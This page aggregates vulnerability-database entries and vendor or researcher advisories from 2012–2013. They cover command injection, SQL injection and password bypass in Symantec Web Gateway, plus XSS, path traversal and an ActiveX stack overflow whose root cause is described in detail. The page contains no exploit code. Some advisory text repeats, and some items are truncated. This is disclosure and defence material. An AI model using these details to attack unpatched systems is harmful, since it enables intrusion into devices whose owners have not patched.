Symantec Web Gateway Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA50031
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/50031/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=50031
RELEASE DATE:
2012-07-23
DISCUSS ADVISORY:
http://secunia.com/advisories/50031/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/50031/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=50031
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in Symantec Web Gateway,
which can be exploited by malicious, local users to bypass certain
security restrictions and by malicious people to bypass certain
security restrictions, conduct SQL injection attacks, and compromise
a vulnerable system.
1) The application improperly validates certain input via the
management console and can be exploited to inject arbitrary shell
commands.
3) Certain unspecified input passed to the management console is not
properly sanitised before being used in a SQL query. This can be
exploited to manipulate SQL queries by injecting arbitrary SQL code.
4) The application improperly validates certain input to multiple
scripts via the management console and can be exploited to e.g.
inject arbitrary shell commands.
5) The application improperly validates certain input via the
management console and can be exploited to change the password of an
arbitrary user of the application.
The vulnerabilities are reported in versions prior to Database Update
5.0.0.438.
SOLUTION:
Apply Database Update 5.0.0.438.
PROVIDED AND/OR DISCOVERED BY:
The vendor credits:
1) Offensive Security via CERT/CC
2, 3) Offensive Security via CERT/CC and an anonymous person via
CERT/CC.
4, 5) An anonymous person via CERT/CC.
ORIGINAL ADVISORY:
SYM12-011:
http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20120720_00
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201207-0233 | CVE-2012-2953 | Symantec Web Gateway contains multiple vulnerabilities |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
The management console in Symantec Web Gateway 5.0.x before 5.0.3.18 allows remote attackers to execute arbitrary commands via crafted input to application scripts.
Successful exploits will result in the execution of arbitrary attack-supplied commands in the context of the affected application. Symantec Web Gateway (SWG) is a set of network content filtering software developed by Symantec Corporation of the United States. The software provides web content filtering, data loss prevention, and more. ----------------------------------------------------------------------
We are millions! Join us to protect all Pc's Worldwide.
Download the new Secunia PSI 3.0 available in 5 languages and share it with your friends:
http://secunia.com/psi
----------------------------------------------------------------------
TITLE:
Symantec Web Gateway Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA50031
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/50031/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=50031
RELEASE DATE:
2012-07-23
DISCUSS ADVISORY:
http://secunia.com/advisories/50031/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/50031/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=50031
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in Symantec Web Gateway,
which can be exploited by malicious, local users to bypass certain
security restrictions and by malicious people to bypass certain
security restrictions, conduct SQL injection attacks, and compromise
a vulnerable system.
2) An error within the authentication mechanism of the application
can be exploited to bypass the authentication by modification of
certain local files.
3) Certain unspecified input passed to the management console is not
properly sanitised before being used in a SQL query. This can be
exploited to manipulate SQL queries by injecting arbitrary SQL code.
inject arbitrary shell commands.
The vulnerabilities are reported in versions prior to Database Update
5.0.0.438.
SOLUTION:
Apply Database Update 5.0.0.438.
PROVIDED AND/OR DISCOVERED BY:
The vendor credits:
1) Offensive Security via CERT/CC
2, 3) Offensive Security via CERT/CC and an anonymous person via
CERT/CC.
4, 5) An anonymous person via CERT/CC.
ORIGINAL ADVISORY:
SYM12-011:
http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20120720_00
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201207-0171 | CVE-2012-2977 | Symantec Web Gateway Password Change Security Bypass Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The management console in Symantec Web Gateway 5.0.x before 5.0.3.18 allows remote attackers to change arbitrary passwords via crafted input to an application script. This may aid in further attacks. Symantec Web Gateway (SWG) is a set of network content filtering software developed by Symantec Corporation of the United States. The software provides web content filtering, data loss prevention, and more. ----------------------------------------------------------------------
We are millions! Join us to protect all Pc's Worldwide.
Download the new Secunia PSI 3.0 available in 5 languages and share it with your friends:
http://secunia.com/psi
----------------------------------------------------------------------
TITLE:
Symantec Web Gateway Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA50031
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/50031/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=50031
RELEASE DATE:
2012-07-23
DISCUSS ADVISORY:
http://secunia.com/advisories/50031/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/50031/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=50031
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in Symantec Web Gateway,
which can be exploited by malicious, local users to bypass certain
security restrictions and by malicious people to bypass certain
security restrictions, conduct SQL injection attacks, and compromise
a vulnerable system.
2) An error within the authentication mechanism of the application
can be exploited to bypass the authentication by modification of
certain local files.
3) Certain unspecified input passed to the management console is not
properly sanitised before being used in a SQL query. This can be
exploited to manipulate SQL queries by injecting arbitrary SQL code.
inject arbitrary shell commands.
The vulnerabilities are reported in versions prior to Database Update
5.0.0.438.
SOLUTION:
Apply Database Update 5.0.0.438.
PROVIDED AND/OR DISCOVERED BY:
The vendor credits:
1) Offensive Security via CERT/CC
2, 3) Offensive Security via CERT/CC and an anonymous person via
CERT/CC.
4, 5) An anonymous person via CERT/CC.
ORIGINAL ADVISORY:
SYM12-011:
http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20120720_00
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201207-0170 | CVE-2012-2976 | Symantec Web Gateway contains multiple vulnerabilities |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
The management console in Symantec Web Gateway 5.0.x before 5.0.3.18 allows remote attackers to execute arbitrary shell commands via crafted input to application scripts, related to an "injection" issue. Symantec Web Gateway is a Web security gateway hardware appliance.
An attacker can exploit this issue to inject and execute arbitrary code in the context of the affected application. This may facilitate a compromise of the application and the underlying system; other attacks are also possible. Symantec Web Gateway (SWG) is a set of network content filtering software developed by Symantec Corporation of the United States. The software provides web content filtering, data loss prevention, and more. ----------------------------------------------------------------------
We are millions! Join us to protect all Pc's Worldwide.
Download the new Secunia PSI 3.0 available in 5 languages and share it with your friends:
http://secunia.com/psi
----------------------------------------------------------------------
TITLE:
Symantec Web Gateway Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA50031
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/50031/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=50031
RELEASE DATE:
2012-07-23
DISCUSS ADVISORY:
http://secunia.com/advisories/50031/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/50031/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=50031
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in Symantec Web Gateway,
which can be exploited by malicious, local users to bypass certain
security restrictions and by malicious people to bypass certain
security restrictions, conduct SQL injection attacks, and compromise
a vulnerable system.
2) An error within the authentication mechanism of the application
can be exploited to bypass the authentication by modification of
certain local files.
3) Certain unspecified input passed to the management console is not
properly sanitised before being used in a SQL query. This can be
exploited to manipulate SQL queries by injecting arbitrary SQL code.
4) The application improperly validates certain input to multiple
scripts via the management console and can be exploited to e.g.
inject arbitrary shell commands.
5) The application improperly validates certain input via the
management console and can be exploited to change the password of an
arbitrary user of the application.
The vulnerabilities are reported in versions prior to Database Update
5.0.0.438.
SOLUTION:
Apply Database Update 5.0.0.438.
PROVIDED AND/OR DISCOVERED BY:
The vendor credits:
1) Offensive Security via CERT/CC
2, 3) Offensive Security via CERT/CC and an anonymous person via
CERT/CC.
4, 5) An anonymous person via CERT/CC.
ORIGINAL ADVISORY:
SYM12-011:
http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20120720_00
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201211-0084 | CVE-2012-5851 | WebKit Cross-site scripting in (XSS) Vulnerabilities that circumvent protection mechanisms |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
html/parser/XSSAuditor.cpp in WebCore in WebKit, as used in Google Chrome through 22 and Safari 5.1.7, does not consider all possible output contexts of reflected data, which makes it easier for remote attackers to bypass a cross-site scripting (XSS) protection mechanism via a crafted string, aka rdar problem 12019108. WebKit is prone to a security-bypass vulnerability.
An attacker can exploit this vulnerability to bypass the cross-site scripting filter mechanism. Successful exploits may allow attackers to execute arbitrary script code and steal cookie-based authentication credentials. WebKit is a set of open source web browser engines jointly developed by companies such as KDE, Apple (Apple), and Google (Google), and is currently used by browsers such as Apple Safari and Google Chrome. A vulnerability exists in html/parser/XSSAuditor.cpp used in WebCore in WebKit in Google Chrome 22 and Safari version 5.1.7. The vulnerability stems from not considering all possible output reflection data
| VAR-201207-0459 | CVE-2012-2202 | IBM ISS Proventia Mail Security contains multiple vulnerabilities |
CVSS V2: 3.5 CVSS V3: - Severity: LOW |
Directory traversal vulnerability in javatester_init.php in IBM Lotus Protector for Mail Security 2.1, 2.5, 2.5.1, and 2.8 and IBM ISS Proventia Network Mail Security System allows remote authenticated administrators to read arbitrary files via a .. (dot dot) in the template parameter.
An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Remote authentication users can use this vulnerability to read arbitrary files through .. ----------------------------------------------------------------------
We are millions! Join us to protect all Pc's Worldwide.
Download the new Secunia PSI 3.0 available in 5 languages and share it with your friends:
http://secunia.com/psi
----------------------------------------------------------------------
TITLE:
IBM Lotus Protector for Mail Security Information Disclosure Weakness
SECUNIA ADVISORY ID:
SA49897
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/49897/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=49897
RELEASE DATE:
2012-07-17
DISCUSS ADVISORY:
http://secunia.com/advisories/49897/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/49897/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=49897
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A weakness has been reported in IBM Lotus Protector for Mail
Security, which can be exploited by malicious users to disclose
potentially sensitive information.
Certain input to the management interface is not properly verified
before being used to display files. This can be exploited to disclose
the contents of arbitrary files.
Successful exploitation requires access to the administrative user
interface (UI).
The weakness is reported in versions 2.5, 2.5.1, and 2.8.
SOLUTION:
Apply updates (please see the vendor's advisory for details).
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
IBM:
http://www.ibm.com/support/docview.wss?uid=swg21605199
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201207-0147 | CVE-2012-3128 | Oracle SPARC T Series server firmware Integrated Lights Out Manager Processing vulnerability |
CVSS V2: 3.7 CVSS V3: - Severity: LOW |
Unspecified vulnerability in Oracle SPARC T-Series Servers running System Firmware 8.2.0 and 8.1.4.e or earlier allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Integrated Lights Out Manager. (DoS) An attack may be carried out. Oracle Sun Products Suite is prone to a local vulnerability in SPARC T-Series Servers.
The 'Integrated Lights Out Manager' sub component is affected.
This vulnerability affects the following supported versions:
System Firmware 8.1.4.e or earlier, System Firmware 8.2.0
| VAR-201207-0320 | CVE-2012-0284 | Cisco Linksys PlayerPT ActiveX Stack-based buffer overflow vulnerability in Control |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Stack-based buffer overflow in the SetSource method in the Cisco Linksys PlayerPT ActiveX control 1.0.0.15 in PlayerPT.ocx on the Cisco WVC200 Wireless-G PTZ Internet video camera allows remote attackers to execute arbitrary code via a long URL in the first argument (aka the sURL argument). Cisco Linksys PlayerPT ActiveX Control is prone to a buffer-overflow vulnerability because the application fails to adequately check boundaries on user-supplied input.
An attacker can exploit this issue to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed attacks will likely cause denial-of-service conditions.
Cisco Linksys PlayerPT 1.0.0.15 is vulnerable; other versions may also be affected.
======================================================================
2) Severity
Rating: Highly critical
Impact: System compromise
Where: Remote
======================================================================
3) Description of Vulnerability
Secunia Research has discovered a vulnerability in Cisco Linksys
PlayerPT ActiveX Control, which can be exploited by malicious people
to compromise a user's system. The ActiveX control is
marked safe-for-scripting and one of the provided methods is:
"SetSource()", which is used to set the source of the footage to view.
The method accepts five string arguments where the first ("sURL") is
the URL to the footage.
When a web page instantiates the ActiveX control and invokes the
"SetSource()" method, the function in PlayerPT.ocx responsible for
handling this method is called. The function performs various checks
on the supplied arguments including a check to determine if the
"sFrameType" string (2nd argument) is set to "mpeg". If so, the
function searches for and strips "img/video.asf" from the provided URL
in the "sURL" argument; if not, "img/mjpeg.cgi" is used.
The URL is stored to a CString object and URLs to various resources
are crafted based on the base URL including an URL to the
"img/query.cgi" resource. Later, this URL is copied into a 256 byte
stack buffer via a call to sprintf() without performing any size
checks. This can be exploited to cause a stack-based buffer overflow
via an overly long, specially crafted URL.
Successful exploitation allows execution of arbitrary code.
======================================================================
4) Solution
According to the vendor, the ActiveX control is bundled only with
products considered EOL and, therefore, itself considered EOL. The
vendor is currently working on getting the kill-bit set.
As a workaround, set the kill-bit for the following CLSID:
* {9E065E4A-BD9D-4547-8F90-985DC62A5591}
======================================================================
5) Time Table
23/03/2012 - Vulnerability discovered while analysing public report of
similar vulnerability (SA48543#1).
23/03/2012 - Vendor notified.
02/04/2012 - Vendor response (WVC200 product bundling the ActiveX
control has become EOL).
03/04/2012 - Vendor informed that ActiveX control should have kill-bit
set if considered EOL and asked to confirm that no
currently supported products bundle it.
13/04/2012 - Status update requested.
15/04/2012 - Vendor response (currently checking which products bundle
the ActiveX control and looking into setting kill-bit).
21/06/2012 - Status update requested.
13/07/2012 - Status update requested.
13/07/2012 - Vendor response (determined that no supported products
bundle the vulnerable ActiveX control and looking into
setting kill-bit).
17/07/2012 - Public disclosure.
======================================================================
6) Credits
Discovered by Carsten Eiram, Secunia Research.
======================================================================
7) References
The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2012-0284 for the vulnerability.
======================================================================
8) About Secunia
Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:
http://secunia.com/advisories/business_solutions/
Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private
individuals, who are interested in or concerned about IT-security.
http://secunia.com/advisories/
Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the
security and reliability of software in general:
http://secunia.com/secunia_research/
Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:
http://secunia.com/corporate/jobs/
Secunia offers a FREE mailing list called Secunia Security Advisories:
http://secunia.com/advisories/mailing_lists/
======================================================================
9) Verification
Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2012-25/
Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/
======================================================================
| VAR-201207-0234 | CVE-2012-2955 | IBM ISS Proventia Mail Security contains multiple vulnerabilities |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Multiple cross-site scripting (XSS) vulnerabilities in the administrative user interface in IBM Lotus Protector for Mail Security 2.1, 2.5, 2.5.1, and 2.8 and IBM ISS Proventia Network Mail Security System allow remote attackers to inject arbitrary web script or HTML via the query string.
An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. IBM Lotus Protector for Mail Security is a set of IBM Lotus Notes, IBM Lotus Domino, Microsoft Exchange and hybrid e-mail environment to provide e-mail content filtering solutions. A remote attacker can exploit this vulnerability to inject arbitrary web scripts or HTML through query strings, and leak arbitrary file content. Vulnerabilities exist in IBM Lotus Protector versions 2.5, 2.5.1, and 2.8. ----------------------------------------------------------------------
We are millions! Join us to protect all Pc's Worldwide.
Download the new Secunia PSI 3.0 available in 5 languages and share it with your friends:
http://secunia.com/psi
----------------------------------------------------------------------
TITLE:
IBM Lotus Protector for Mail Security Information Disclosure Weakness
SECUNIA ADVISORY ID:
SA49897
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/49897/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=49897
RELEASE DATE:
2012-07-17
DISCUSS ADVISORY:
http://secunia.com/advisories/49897/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/49897/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=49897
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A weakness has been reported in IBM Lotus Protector for Mail
Security, which can be exploited by malicious users to disclose
potentially sensitive information.
Certain input to the management interface is not properly verified
before being used to display files. This can be exploited to disclose
the contents of arbitrary files.
Successful exploitation requires access to the administrative user
interface (UI).
The weakness is reported in versions 2.5, 2.5.1, and 2.8.
SOLUTION:
Apply updates (please see the vendor's advisory for details).
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
IBM:
http://www.ibm.com/support/docview.wss?uid=swg21605199
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-202001-0837 | CVE-2013-1597 |
Vivotek Network Cameras Information Disclosure Vulnerability
Related entries in the VARIoT exploits database: VAR-E-201207-0004 |
CVSS V2: 4.0 CVSS V3: 6.5 Severity: MEDIUM |
A Directory Traversal vulnerability exists in Vivotek PT7135 IP Cameras 0300a and 0400a via a specially crafted GET request, which could let a malicious user obtain user credentials. Vivotek PT7135 IP Camera Contains a path traversal vulnerability.Information may be obtained. Vivotek Network Cameras is a wireless network camera. Vivotek Network Cameras failed to properly handle user-submitted requests, allowing remote attackers to submit malicious requests for sensitive information such as FTP and DYNDNS. Multiple Vivotek IP Camera products are prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
Successful exploits will allow a remote attacker to gain access to sensitive information. Information obtained will aid in further attacks. Core Security - Corelabs Advisory
http://corelabs.coresecurity.com
Vivotek IP Cameras Multiple Vulnerabilities
1. *Advisory Information*
Title: Vivotek IP Cameras Multiple Vulnerabilities
Advisory ID: CORE-2013-0301
Advisory URL:
http://www.coresecurity.com/advisories/vivotek-ip-cameras-multiple-vulnerabilities
Date published: 2013-04-29
Date of last update: 2013-04-29
Vendors contacted: Vivotek
Release mode: User release
2. *Vulnerability Information*
Class: Information leak through GET request [CWE-598], Buffer overflow
[CWE-119], Authentication issues [CWE-287], Path traversal [CWE-22], OS
command injection [CWE-78]
Impact: Code execution, Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2013-1594, CVE-2013-1595, CVE-2013-1596, CVE-2013-1597,
CVE-2013-1598
3. *Vulnerability Description*
Multiple vulnerabilities have been found in Vivotek IP cameras [1] (and
potentially cameras from other vendors sharing the affected firmware)
that could allow an unauthenticated remote attacker:
1. [CVE-2013-1594] to process GET requests that contain sensitive
information,
2. [CVE-2013-1595] to execute arbitrary code,
3. [CVE-2013-1596] to access the video stream via RTSP,
4. [CVE-2013-1597] to dump the camera's memory and retrieve user
credentials,
5. [CVE-2013-1598] to execute arbitrary commands from the
administration web interface (pre-authentication with firmware 0300a and
post-authentication with firmware 0400a).
4. *Vulnerable Packages*
. Other Vivotek cameras/firmware are probably affected too, but they
were not checked.
5. *Non-Vulnerable Packages*
Vendor did not provide details. Contact Vivotek for further information.
6. *Vendor Information, Solutions and Workarounds*
There was no official answer from Vivotek after several attempts to
report these vulnerabilities (see [Sec. 9]). Contact vendor for further
information.
Some mitigation actions may be:
. Do not expose the camera to internet unless absolutely necessary. Filter RTSP traffic (default port 554) if possible. Have at least one proxy filtering '/../../' and 'getparam.cgi' in
HTTP requests. Filter strings in the parameter 'system.ntp' on every request made
to the binary 'farseer.out'.
7. *Credits*
[CVE-2013-1594] was originally discovered and reported [2] by Alejandro
Leon Morales [3] and re-discovered on new firmware versions by Flavio De
Cristofaro from Core Security.
[CVE-2013-1595] and [CVE-2013-1596] were discovered and researched by
Martin Rocha from Core Impact Pro Team. The PoC of [CVE-2013-1596] was
made by Martin Rocha with help of Juan Cotta from Core QA Team.
[CVE-2013-1597] and [CVE-2013-1598] were discovered and researched by
Francisco Falcon and Nahuel Riva from Core Exploit Writers Team.
